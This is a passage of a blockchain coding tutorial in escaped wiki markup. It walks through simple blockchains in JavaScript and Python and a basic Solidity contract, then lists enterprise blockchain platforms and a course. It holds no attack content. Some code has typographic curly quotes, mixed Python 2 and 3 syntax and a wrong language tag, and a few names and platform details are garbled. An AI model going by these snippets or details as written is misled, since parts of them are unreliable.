&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
createGenesisBlock()&lt;br /&gt;
{&lt;br /&gt;
return new Block(0, “01/01/2017”, “Genesis block”, “0”);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now that we have built the genesis block, let’s build the rest of the chain.&lt;br /&gt;
&lt;br /&gt;
====Section 2: Adding The Blocks====&lt;br /&gt;
Firstly, we will need to know what the last block in the blockchain currently is. For that we use the getLatestBlock() function.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
getLatestBlock() &lt;br /&gt;
{ &lt;br /&gt;
return this.chain[this.chain.length - 1]; &lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now that we have determined the latest block, let’s see how we are going to add new blocks.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
addBlock(newBlock) { &lt;br /&gt;
newBlock.previousHash = this.getLatestBlock().hash; &lt;br /&gt;
newBlock.hash = newBlock.calculateHash(); &lt;br /&gt;
this.chain.push(newBlock); &lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
So, what is happening here? How are we adding the blocks? How are we checking if the given block is valid or not?&lt;br /&gt;
&lt;br /&gt;
Remember the contents of a block?&lt;br /&gt;
&lt;br /&gt;
A block has the hash of the previous block right?&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
So, what we are going to do here is simple. Compare the previousHash value of the new block with the hash value of the latest block.&lt;br /&gt;
&lt;br /&gt;
https://blockgeeks.com/wp-content/uploads/2017/11/image3.png&lt;br /&gt;
&lt;br /&gt;
Image Courtesy: Lauri Hartikka medium article&lt;br /&gt;
&lt;br /&gt;
If these two values match, then this means that the new block is legit and it gets added to the blockchain.&lt;br /&gt;
&lt;br /&gt;
====Section 3: Validating the Chain====&lt;br /&gt;
&lt;br /&gt;
Now, we need to check that nobody has been messing with our blockchain and that everything is stable.&lt;br /&gt;
&lt;br /&gt;
We are using the “for” loop to go from the block 1 to the last block. Genesis block is block 0.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
for (let i = 1; i &amp;lt; this.chain.length; i++)&lt;br /&gt;
{ &lt;br /&gt;
const currentBlock = this.chain[i]; &lt;br /&gt;
const previousBlock = this.chain[i - 1]; &lt;br /&gt;
&lt;br /&gt;
//In this part of the code we are defining two terms, current block and previous block.  And now we are simply going to find the hash of these two values.&lt;br /&gt;
if (currentBlock.hash !== currentBlock.calculateHash()) { &lt;br /&gt;
   return false; &lt;br /&gt;
}&lt;br /&gt;
if (currentBlock.previousHash !== previousBlock.hash) &lt;br /&gt;
{ &lt;br /&gt;
   return false; &lt;br /&gt;
} &lt;br /&gt;
} &lt;br /&gt;
return true; &lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the “previousHash” of the current block is not equal to the “Hash” of the previous block, then this function will return False, else it will return True.&lt;br /&gt;
&lt;br /&gt;
====Using the blockchain====&lt;br /&gt;
Now, we are going to finally use the blockchain to create our BlockGeeksCoin.&lt;br /&gt;
&lt;br /&gt;
*let BlockGeeksCoin = new Blockchain();&lt;br /&gt;
*BlockGeeksCoin.addBlock(new Block(1, “20/07/2017”, { amount: 4 }));&lt;br /&gt;
*BlockGeeksCoin.addBlock(new Block(2, “20/07/2017”, { amount: 8 }));&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
And that’s it!&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;So what happened here?&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
We created a new cryptocurrency based on the blockchain and named it BlockGeeksCoin. By invoking this new object, I activated the constructor, which in turn created the Genesis block automatically.&lt;br /&gt;
&lt;br /&gt;
We simply added two more blocks to it and gave them some data.&lt;br /&gt;
&lt;br /&gt;
It is that simple.&lt;br /&gt;
&lt;br /&gt;
(Thank you savjee.be for the amazing and simple explanation.)&lt;br /&gt;
&lt;br /&gt;
===Language #3: Python===&lt;br /&gt;
&lt;br /&gt;
[[Guido van Rossum]], a Dutch programmer, created Python back in 1991. Python is based on a simple philosophy: Simplicity and Minimalism. One of the more notable ways that they incorporated simplicity into their language is by using white spaces to signify code blocks instead of curly brackets or keywords. Let’s see what this means.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Let’s checkout a simple “hello world” program.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
print(‘Hello, world!’)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Yup, that’s it!&lt;br /&gt;
&lt;br /&gt;
Compare that to the C++ “hello world” program.&lt;br /&gt;
&lt;br /&gt;
See how less complicated it is in comparison?  How about we do something a little more complicated? Let’s say we are adding two numbers and printing the result.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
num1 = 1.5&lt;br /&gt;
&lt;br /&gt;
num2 = 6.3&lt;br /&gt;
&lt;br /&gt;
sum = float(num1) + float(num2)&lt;br /&gt;
&lt;br /&gt;
print(‘The sum of {0} and {1} is {2}’.format(num1, num2, sum))&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
And that’s it.&lt;br /&gt;
&lt;br /&gt;
The output of this program will be:&lt;br /&gt;
&lt;br /&gt;
The sum of 1.5 and 6.3 is 7.8&lt;br /&gt;
So, let’s up the ante. How are we going to program an entire blockchain using Python? The following data and code is taken from Gerald Nash’s article in Medium.&lt;br /&gt;
&lt;br /&gt;
====Creating the block====&lt;br /&gt;
Firstly, let’s make our block:&lt;br /&gt;
&lt;br /&gt;
import hashlib as hasher&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
class Block:&lt;br /&gt;
  def __init__(self, index, timestamp, data, previous_hash):&lt;br /&gt;
    self.index = index&lt;br /&gt;
    self.timestamp = timestamp&lt;br /&gt;
    self.data = data&lt;br /&gt;
    self.previous_hash = previous_hash&lt;br /&gt;
    self.hash = self.hash_block()&lt;br /&gt;
  &lt;br /&gt;
  def hash_block(self):&lt;br /&gt;
    sha = hasher.sha256()&lt;br /&gt;
    sha.update(str(self.index) + &lt;br /&gt;
               str(self.timestamp) + &lt;br /&gt;
               str(self.data) + &lt;br /&gt;
               str(self.previous_hash))&lt;br /&gt;
    return sha.hexdigest()&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Code Analysis&lt;br /&gt;
&lt;br /&gt;
We are starting off by importing the hash library to use the SHA 256 hash finctions (quite like Javascript).&lt;br /&gt;
&lt;br /&gt;
Just like before, the block has the same value:&lt;br /&gt;
&lt;br /&gt;
*Index.&lt;br /&gt;
*Timestamp.&lt;br /&gt;
*Data.&lt;br /&gt;
*Previous hash.&lt;br /&gt;
*Hash.&lt;br /&gt;
&lt;br /&gt;
Once against, we are filling up the hash values via a function, same as before.&lt;br /&gt;
&lt;br /&gt;
====Creating the genesis block====&lt;br /&gt;
Now, let’s create the Genesis block:&lt;br /&gt;
import datetime as date&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
def create_genesis_block():&lt;br /&gt;
&lt;br /&gt;
return Block(0, date.datetime.now(), “Genesis Block”, “0”)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Code Analysis&lt;br /&gt;
&lt;br /&gt;
We have imported datetime to put in the timestamp.&lt;br /&gt;
&lt;br /&gt;
We simply generated the genesis block and manually given it some data to work with. The previous hash value is “0” because it is pointing to no other block.&lt;br /&gt;
&lt;br /&gt;
====Creating the rest of the blocks====&lt;br /&gt;
&lt;br /&gt;
Now let’s define how the subsequent blocks will be created.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
def next_block(last_block):&lt;br /&gt;
  this_index = last_block.index + 1&lt;br /&gt;
  this_timestamp = date.datetime.now()&lt;br /&gt;
  this_data = &amp;quot;Hey! I&amp;#039;m block &amp;quot; + str(this_index)&lt;br /&gt;
  this_hash = last_block.hash&lt;br /&gt;
  return Block(this_index, this_timestamp, this_data, this_hash)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Code Analysis&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
So, how are we going to be determining the values of each and every piece of data inside each and every block?&lt;br /&gt;
&lt;br /&gt;
The block index is simple the index of the last block + 1.&lt;br /&gt;
&lt;br /&gt;
The timestamp is the current date and time.&lt;br /&gt;
&lt;br /&gt;
The data of the block is a simple message: “Hey! I’m block &amp;lt;index number&amp;gt;”.&lt;br /&gt;
&lt;br /&gt;
Hash we are calculating using the function we definted earlier.&lt;br /&gt;
&lt;br /&gt;
And ultimately, we are returning all these values to the block.&lt;br /&gt;
&lt;br /&gt;
====Creating the blockchain====&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Finally, let’s create the blockchain.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
blockchain = [create_genesis_block()]&lt;br /&gt;
previous_block = blockchain[0]&lt;br /&gt;
&lt;br /&gt;
num_of_blocks_to_add = 15&lt;br /&gt;
&lt;br /&gt;
for i in range(0, num_of_blocks_to_add):&lt;br /&gt;
  block_to_add = next_block(previous_block)&lt;br /&gt;
  blockchain.append(block_to_add)&lt;br /&gt;
  previous_block = block_to_add&lt;br /&gt;
  # Tell everyone about it!&lt;br /&gt;
  print &amp;quot;Block #{} has been added to the blockchain!&amp;quot;.format(block_to_add.index)&lt;br /&gt;
  print &amp;quot;Hash: {}n&amp;quot;.format(block_to_add.hash)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Code Analysis&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Firstly, we create the genesis block and give its value to “previous_block”.&lt;br /&gt;
&lt;br /&gt;
Then we determine how many blocks to add, in this example we are going with 15.&lt;br /&gt;
&lt;br /&gt;
So we are running a loop that goes till 15 and adds each and every block to the blockchain. At the end of the look we are printing which number block has been added to the blockchain via showing their index number. Plus, we are printing the Hash as well.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;This is what the output will look like:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
https://blockgeeks.com/wp-content/uploads/2017/11/image2.png&lt;br /&gt;
&lt;br /&gt;
Image Courtesy: Gerald Nash Medium Article&lt;br /&gt;
&lt;br /&gt;
Obviously in both this and the javascript you could add more complicated features like Proof Of Work. If you want to learn how to implement that then it is highly recommended to go through [[Gerald Nash]]’s article. But for now, you at least know how to create a simple blockchain in Python.&lt;br /&gt;
&lt;br /&gt;
===Language #4: Solidity===&lt;br /&gt;
Finally, we come to Solidity. For anyone who wants learn how to make DAPPs ([[Decentralized Applications]]) or get into the [[ICO game]], learning [[Solidity]] is an absolute must. We already have a detailed guide on it which you can read here. However, here we are going to give you a basic overview. Solidity was developed by [[Gavin Wood]], [[Christian Reitwiessner]], ]]Alex Beregszaszi]], [[Yoichi Hirai]] and several former [[Ethereum]] core contributors to enable writing smart contracts on blockchain platforms such as [[Ethereum]].&lt;br /&gt;
&lt;br /&gt;
Solidity is a purposefully slimmed down, loosely-typed language with a syntax very similar to [[ECMAScript]] ([[Javascript]]). There are some key points to remember from the [[Ethereum Design Rationale]] document, namely that we are working within a stack-and-memory model with a 32-byte instruction word size, the EVM ([[Ethereum Virtual Machine]]) gives us access to the program “stack” which is like a register space where we can also stick memory addresses to make the Program Counter loop/jump (for sequential program control), an expandable temporary “memory” and a more permanent “storage” which is actually written into the permanent blockchain, and most importantly, the EVM requires total determinism within the smart contracts.&lt;br /&gt;
&lt;br /&gt;
So, before we continue, let’s checkout a basic Solidity contract example. (Codes taken from github).&lt;br /&gt;
&lt;br /&gt;
Let’s run a simple while loop in solidity:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
contract BasicIterator &lt;br /&gt;
{ &lt;br /&gt;
address creator; // reserve one &amp;quot;address&amp;quot;-type spot &lt;br /&gt;
uint8[10] integers; // reserve a chunk of storage for 10 8-bit unsigned integers in an array &lt;br /&gt;
function BasicIterator() &lt;br /&gt;
{ &lt;br /&gt;
creator = msg.sender;&lt;br /&gt;
uint8 x = 0; &lt;br /&gt;
&lt;br /&gt;
//Section 1: Assigning values&lt;br /&gt;
while(x &amp;lt; integers.length) { &lt;br /&gt;
integers[x] = x;  &lt;br /&gt;
x++; &lt;br /&gt;
} } &lt;br /&gt;
&lt;br /&gt;
function getSum() constant returns (uint) { &lt;br /&gt;
uint8 sum = 0; &lt;br /&gt;
uint8 x = 0; &lt;br /&gt;
&lt;br /&gt;
//Section 2: Adding the integers in an array.&lt;br /&gt;
while(x &amp;lt; integers.length) { &lt;br /&gt;
sum = sum + integers[x];&lt;br /&gt;
 x++; &lt;br /&gt;
} &lt;br /&gt;
return sum; &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
// Section 3: Killing the contract&lt;br /&gt;
function kill() &lt;br /&gt;
{ &lt;br /&gt;
if (msg.sender == creator) &lt;br /&gt;
{ &lt;br /&gt;
suicide(creator); &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;So, let’s analyse.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
====Section 1: Assigning Values====&lt;br /&gt;
In the first step we are filling up an array called “integers” which takes in 10 8-bit unsigned integers.  The way we are doing it is via a while loop. Let’s look at what is happening inside the while loop.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
while(x &amp;lt; integers.length) {&lt;br /&gt;
integers[x] = x;&lt;br /&gt;
x++;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Remember, we have already assigned a value of “0” to the integer x. The while loop goes from 0 to integers.length. Integers.length is a function which returns the max capacity of the array. So, if we decided that an array will have 10 integers, arrayname.length will return a value of 10. In the loop above, the value of x goes from 0 – 9 (&amp;lt;10) and assigns the value of itself to the integers array as well. So, at the end of the loop, integers will have the following value:&lt;br /&gt;
&lt;br /&gt;
0,1,2,3,4,5,6,7,8,9.&lt;br /&gt;
&lt;br /&gt;
====Section 2: Adding the array content====&lt;br /&gt;
&lt;br /&gt;
Inside the getSum() function we are going to add up the contents of the array itself. The way are going to do it is by repeating the same while loop as above and using the variable “sum” to add the contents of the array.&lt;br /&gt;
&lt;br /&gt;
====Section 3: Killing the contract====&lt;br /&gt;
&lt;br /&gt;
This function kills the contract and sends the remaining funds in the contract back to the contract creator.&lt;br /&gt;
&lt;br /&gt;
When asked about what was the inspiration and motivation behind creating solidity, Dr. [[Gavin Woods]] said this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
“It [Solidity] was meant to be a sophisticated tool for developing contracts that could ultimately give both developers and users good information on what the code did. To help this along, I devised NatSpec, a contract-friendly documentation format, and made that a first-class citizen in Solidity. I also proposed a formal proofing language subset (not yet implemented) in order to maximise the kinds of correctness guarantees that could be made.&lt;br /&gt;
&lt;br /&gt;
I introduced events as a first class citizen into the Solidity language in order to provide a nice abstraction for LOGs similar in form to function calls. Inspiration for that came from the Qt meta-object system’s “signals”.&lt;br /&gt;
&lt;br /&gt;
One later feature that Christian R. and I figured out together was function modifiers; that allows attributes placed as part of a function signature to make some modifications to the apparent function body. Being a very declarative means of expression, it’s an idiom that falls nicely into the contract-oriented programming space.”&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;it’s an idiom that falls nicely into the contract-oriented programming space.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
==Blockchain Coding: Conclusion==&lt;br /&gt;
&lt;br /&gt;
In this article we have only covered 4 languages for blockchain coding that are used in developing in and around the blockchain. &amp;#039;&amp;#039;&amp;#039;In reality there are many many more languages that you can potentially use (Java, Go). If you are a programmer, then the possibilities for you are truly endless&amp;#039;&amp;#039;&amp;#039;. As the world becomes more and more decentralized and blockchain becomes more and more mainstream, the future for you is definitely limitless.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=The top enterprise blockchain platforms=&lt;br /&gt;
==Basis of selecting the Blockchain platforms==&lt;br /&gt;
Choosing a Enterprise Blockchain framework is even more tricky, since you will have to be careful about a variety of factors before, during and after implementation.&lt;br /&gt;
&lt;br /&gt;
From our experience these are some of the factors that you should look out for when choosing your Enterprise Blockchain framework:&lt;br /&gt;
&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;License&amp;#039;&amp;#039;&amp;#039;; what is the framework licensed under? Is it completely free to use? or does it comes with a package attached to it?&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Community&amp;#039;&amp;#039;&amp;#039;; is the community large enough around the framework? How vibrant is the community?&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Support model&amp;#039;&amp;#039;&amp;#039;; is the framework receiving any support from a large corporation? this will help predict the longevity of a framework.&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Activity&amp;#039;&amp;#039;&amp;#039;; how often is the framework receiving patches and feature updates?&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Roadmap&amp;#039;&amp;#039;&amp;#039;; is the framework having a roadmap that you can predict in the future?&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Ease of use&amp;#039;&amp;#039;&amp;#039;; the last thing you want to do is to get stuck in a complex mesh of new technology that is yet to see large-scale adoption.&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Pricing&amp;#039;&amp;#039;&amp;#039; – Free, Paid Pricing tier information&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;GitHub repo&amp;#039;&amp;#039;&amp;#039; – Names of the GitHub repo for the SDKs&lt;br /&gt;
*&amp;#039;&amp;#039;&amp;#039;Popularity&amp;#039;&amp;#039;&amp;#039; – How popular is the platform based on its GitHub stats (stars, forks etc.)&lt;br /&gt;
&lt;br /&gt;
==Frameworks==&lt;br /&gt;
===[[Ethereum]]===&lt;br /&gt;
In 2014 Ethereum founders Vitalik Buterin, Gavin Wood and Jeffrey Wilcke began work on a next-generation blockchain and had the ambition to implement a general, fully trust less smart contract platform.&lt;br /&gt;
&lt;br /&gt;
Ethereum is an open blockchain platform that lets anyone build and use decentralized applications that run on blockchain technology. Like Bitcoin no one controls or owns Ethereum. It is an open-source project build by many people around the world. Ethereum is adaptable and flexible unlike the Bitcoin protocol.​&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity &amp;amp; Activity : High, Actively followed in GitHub&lt;br /&gt;
* Type of network : Public, Smart Contract based&lt;br /&gt;
* Pricing : Ether for transaction and computational services&lt;br /&gt;
* Supported Languages : Python, Go , C++&lt;br /&gt;
* GitHub Repo : &lt;br /&gt;
** pyethereum (Python)&lt;br /&gt;
** gpethereum (GoLang)&lt;br /&gt;
** cpp-ethereum (C++)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===[[Hyperledger]](Sawtooth Lake)===&lt;br /&gt;
&lt;br /&gt;
The Hyperledger is an open source collaborative effort created to advance cross-industry Blockchain technologies. It is a global collaboration including industry leaders in fields of finance, banking, Internet of Things, supply chains, manufacturing and technology. &lt;br /&gt;
&lt;br /&gt;
Hyperledger has many project under it, as submitted by the member companies. Check out their projects page for more details. ​Sawtooth Lake is one of the major project under Hyperledger that is submitted by Intel and supports a modular Blockchain suite. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : High and actively updated in GitHub&lt;br /&gt;
* Type of network : Both Private and Public&lt;br /&gt;
* Pricing : Open Source&lt;br /&gt;
* Supported Languages : Python (For Sawtooth Lake)&lt;br /&gt;
* GitHub Repo : sawtooth-core (Python)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Multichain===&lt;br /&gt;
&lt;br /&gt;
Multichain is a platform for the creation and deployment of private Blockchains (permissioned Blockchains) either within or between organizations. It aims to overcome a key obstacle to the deployment of blockchain technology in the institutional financial sector.  By providing privacy and control within a private peer-to-peer network it is an enhanced version of the Bitcoin core software for private financial transactions.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Medium but actively updated in GitHub&lt;br /&gt;
* Type of network : Private, Permissioned&lt;br /&gt;
* Pricing : Free, Open Source&lt;br /&gt;
* Supported Languages : Python,  C#, JavaScript , PHP, Ruby&lt;br /&gt;
* GitHub Repo : &lt;br /&gt;
**             savior (Python)&lt;br /&gt;
**             c# MultichainLib (C#)&lt;br /&gt;
**             Multichain-Node (JavaScript)&lt;br /&gt;
**             libphp-multichain (PHP)&lt;br /&gt;
**             multichain-client (Ruby)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===HydraChain===&lt;br /&gt;
&lt;br /&gt;
HydraChain is a joint development effort of brainbot technologies and the Ethereum project. According to their website, HydraChain is an extension of the Ethereum platform which supports the creation of scalable blockchain based applications that comply with organizational and regulatory requirements.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Low but actively updated in GitHub&lt;br /&gt;
* Type of network : Private / Permissioned&lt;br /&gt;
* Pricing : Open Source&lt;br /&gt;
* Supported Languages : &lt;br /&gt;
**                      Python&lt;br /&gt;
**                      GitHub Repo&lt;br /&gt;
**                      hydrachain (Python)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Open Chain===&lt;br /&gt;
&lt;br /&gt;
Openchain is developed by Coinprism, the company behind the colored coins standard Open Assets. &lt;br /&gt;
&lt;br /&gt;
Openchain claims to be well suited for organizations wishing to issue and manage digital assets​. It takes a different approach than the standard Bitcoin approach on implementing Blockchain.  Thereby, it follows a partitioned consensus system in which every Openchain instance only has one authority for validating transactions, depending on the assets being exchanged. This, in  turn, leads to a client-server (centralized) architecture which they claim to be more efficient and reliable than a peer-to-peer architecture.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Medium but actively updated in GitHub&lt;br /&gt;
* Type of network : Private&lt;br /&gt;
* Pricing : Open Source&lt;br /&gt;
* Supported Languages : &lt;br /&gt;
**                      Javascript&lt;br /&gt;
**                      GitHub Repo&lt;br /&gt;
**                      openchain-js (Javascript)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===IBM Bluemix Blockchain===&lt;br /&gt;
&lt;br /&gt;
IBM has also released its Blockchain platform which is available as part of the Bluemix service catalog. It is also built on top of the HyperLedger project and offers additional security and infrastructure facilities for enterprises.  &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Medium but actively updated in GitHub&lt;br /&gt;
* Type of network : Private/ Permissioned&lt;br /&gt;
* Pricing : Limited free plan with paid upgrade to enterprise plan &lt;br /&gt;
* Supported Languages : Go, Javascript&lt;br /&gt;
* GitHub Repo : &lt;br /&gt;
**             learn-chaincode (Go)&lt;br /&gt;
**             ibm-blockchain-js (Javascript)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Chain===&lt;br /&gt;
&lt;br /&gt;
Chain is yet another Blockchain platform that claims to be well suited for financial applications &lt;br /&gt;
&lt;br /&gt;
It is based on &amp;quot;Chain Core&amp;quot; which is an enterprise software product that implements the Chain Protocol. An open-source developer edition is also available freely.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Medium but actively updated in GitHub&lt;br /&gt;
* Type of network : Permissioned&lt;br /&gt;
* Pricing : Enterprise Licensing&lt;br /&gt;
* Supported Languages : Java, Ruby, Node.JS&lt;br /&gt;
* GitHub Repo : &lt;br /&gt;
**              sdk-Java (Java)&lt;br /&gt;
**              sdk-Ruby (Ruby)&lt;br /&gt;
**              sdk-Nodejs (Node.JS/Javascript)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===IOTA===&lt;br /&gt;
&lt;br /&gt;
IOTA is the new kid in the block. It is yet another implementation of Blockchain, currently in beta. It deviates from the standard Blockchain. It is based on a concept of blockless distributed ledger called Tangle. It promises to be a key enabler for machine economy and supports infinitesimally small nanopayments without any fees. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key Takeaways&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
* Popularity : Low but actively updated in GitHub&lt;br /&gt;
* Type of network : Public, Permissioned&lt;br /&gt;
* Pricing : Based on IOTA Token, Pricing not clear as yet&lt;br /&gt;
* Supported Languages : Python , C, Javascript&lt;br /&gt;
* GitHub Repo : &lt;br /&gt;
**              iota.lib.py (Java)&lt;br /&gt;
**              ccurl (C)&lt;br /&gt;
**              iota.lib.js (Javascript)&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.horsesforsources.com/storage/app/media/Phil%20MARCH%20APRIL%202018/Enterprise%20Blockchain%20Platforms.jpg&lt;br /&gt;
&lt;br /&gt;
=Best Blockchain Certification, Training &amp;amp; Course=&lt;br /&gt;
&lt;br /&gt;
A global team of 50+ Blockchain experts have compiled this list of Best Blockchain Certification, Training, Course, Classes &amp;amp; Tutorial available online for 2018. These resources will help you Learn Blockchain from scratch, and are suitable for beginners, intermediate learners as well as experts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Blockchain Certification from State University of New York (Coursera)==&lt;br /&gt;
Divided into 4 courses, this specialization covers Basics, [[Smart Contracts]], [[Decentralized Applications]](Dapps) and Platforms. Taught by [[Bina Ramamurthy]], the course has been designed by [[State University of New York]] (SUNY) and [[University of Buffalo]] which have cumulative decades of teaching experience and millions of alumni members across the globe. Learning in this programs goes from understanding how to design, deploy and execute a smart contract to developing decentralized applications and develop a broad understanding of the entire ecosystem. The comprehensive program spans 16 weeks with you having to invest around 3-4 hours each week.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Very detailed program covering all aspects of the subject&lt;br /&gt;
&lt;br /&gt;
*If you are looking to learn different aspects at one place, this might be the best bet&lt;br /&gt;
&lt;br /&gt;
*Comes with the backing of State University of New York and University of Buffalo, and is available on leading e-learning platform Coursera&lt;br /&gt;
&lt;br /&gt;
*Includes projects to help you practice and apply the skills you learn&lt;br /&gt;
&lt;br /&gt;
*Knowledge of any high level programming language is enough to get started with this program&lt;br /&gt;
&lt;br /&gt;
*You can opt for a free 7 day trial of this course before deciding to pay for it&lt;br /&gt;
&lt;br /&gt;
Duration : 16 weeks / 4 hours per week&lt;br /&gt;
Rating : 4.6 out of 5&lt;br /&gt;
&lt;br /&gt;
